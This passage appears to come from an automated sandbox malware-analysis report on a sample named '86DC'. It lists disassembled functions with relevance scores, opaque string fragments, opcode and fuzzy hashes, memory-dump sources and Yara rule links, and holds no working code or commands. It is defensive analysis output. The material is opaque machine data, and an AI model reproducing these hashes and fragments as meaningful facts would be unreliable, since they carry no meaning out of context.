                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                                      Function 024CC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction ID: 4817a57f29f6e4c56eda50793fc54477d53a8b094cc5cde1d6e55ff443de46a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87A1E87510C3818AE368CF29C4907BBBBD2AFD2314F288A6ED4DE87391DB758449C756
                                                                                                                                                                                                                                                                                      Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                      • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                                      Function 024CC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                      • Instruction ID: 9b738327760ee2c4f2de8305ee17f3a1eaf8c9dca2c6d5a5664dc4ce5a9aba2d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCA1F87410C3818AE364CF29C4907BBBBD2AFD2314F288A6ED4DE87391DB758449C752
                                                                                                                                                                                                                                                                                      Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                      • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                                      Function 024CC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                      • Instruction ID: 496086d3404eed7a5a9ebaa726532223fb08fa79ecfd6bf0cd76cbc183b80b16
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00A1D67510C3818AE364CF29C4907BBBBD2AFD2314F288A6ED4DD8B391DB74844AC756
                                                                                                                                                                                                                                                                                      Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                                                      • API String ID: 0-979945983
                                                                                                                                                                                                                                                                                      • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                                      • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                                                      Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                                      • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                                      • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                                      • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                                                      Function 024BE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                                                      • API String ID: 0-3432275560
                                                                                                                                                                                                                                                                                      • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                      • Instruction ID: 3faa7a69bb4ac4e76d5cc59992b34319cc73639cba000e64a611e9e2fb346017
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D42F6706083908FC726DF28C8507EFBBE1AFD6214F48866EE8E55B392D7359505CB62
                                                                                                                                                                                                                                                                                      Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                      • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                                      Function 024CB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                      • Instruction ID: e9c3c3fc0ba363620b01016382a173f9f7f5ce786023cd46b78fdff8f6b5be05
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33E1F77511D3C18BE765CF29C4517BBBBD6EF92208F28896EC0D987392DB39810AC712
                                                                                                                                                                                                                                                                                      Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                                      • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                                      Function 024CB763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c51cd5d7074d907fcce2674e61627e9c038189c1a09bec547b06ac12bf0703d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28E1C87551D3C18AE775CF29C4517BBBBD6EFD2208F28486EC1C987292DB39414ACB12
                                                                                                                                                                                                                                                                                      Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                                      • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                                      • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                                      • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                                      Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                      • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                                      Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                                      • API String ID: 0-483502859
                                                                                                                                                                                                                                                                                      • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                      • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                                      Function 024AD25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                                                      • API String ID: 0-483502859
                                                                                                                                                                                                                                                                                      • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                      • Instruction ID: b2f7f107b0d36ab32b2f3af311ed18a867fd49709f6d53fd345148300733178a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5A1B4B56017818FD718CF29C590A62BBF2FFA6304B19959DC4D68FB66D774E802CB10
                                                                                                                                                                                                                                                                                      Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                                                      • API String ID: 0-2543814982
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                                                      Function 024B87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                                      • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                                      • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                      • Instruction ID: e95a4c14592247440637cf927f938b8b7ef9234985c66080cb5a6bdd1ffecf57
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2081CB75600712CFCB29CF29C890AA7B7F2FF9A710B19859DC8824FB65E734A442CB55
                                                                                                                                                                                                                                                                                      Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                                                      • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
